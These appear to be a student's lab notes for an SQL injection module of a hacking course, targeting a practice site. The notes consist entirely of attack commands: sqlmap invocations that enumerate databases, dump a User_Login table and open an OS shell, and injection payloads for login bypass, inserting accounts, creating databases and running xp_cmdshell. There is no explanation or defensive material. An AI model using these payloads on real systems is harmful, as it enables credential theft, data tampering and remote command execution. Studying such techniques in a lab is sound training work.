Module 15: SQL Injection

iLabs pg no. 1594
SQLMAP Extract DBS
- sqlmap -u “[<http://www.moviescope.com/viewprofile.aspx?id=1”>](<http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D>) --cookie="xookies xxx" --dbs
Extract Tables
- sqlmap -u “[<http://www.moviescope.com/viewprofile.aspx?id=1”>](<http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D>) --cookie="cookies xxx" -D moviescope --tables
Extract Columns
- sqlmap -u “[<http://www.moviescope.com/viewprofile.aspx?id=1”>](<http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D>) --cookie="cookies xxx" -D moviescope -T User_Login --columns
Dump Data
- sqlmap -u “[<http://www.moviescope.com/viewprofile.aspx?id=1”>](<http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D>) --cookie="cookies xxx" -D moviescope -T User_Login --dump
OS Shell to execute commands
- sqlmap -u “[<http://www.moviescope.com/viewprofile.aspx?id=1”>](<http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D>) --cookie="cookies xxx" --os-shell
Login bypass
- blah' or 1=1 --
Insert data into DB from login
- blah';insert into login values ('john','apple123');
Create database from login
- blah';create database mydatabase;
Execute cmd from login
- blah';exec master..xp_cmdshell 'ping www.moviescope.com -l 65000 -t'; --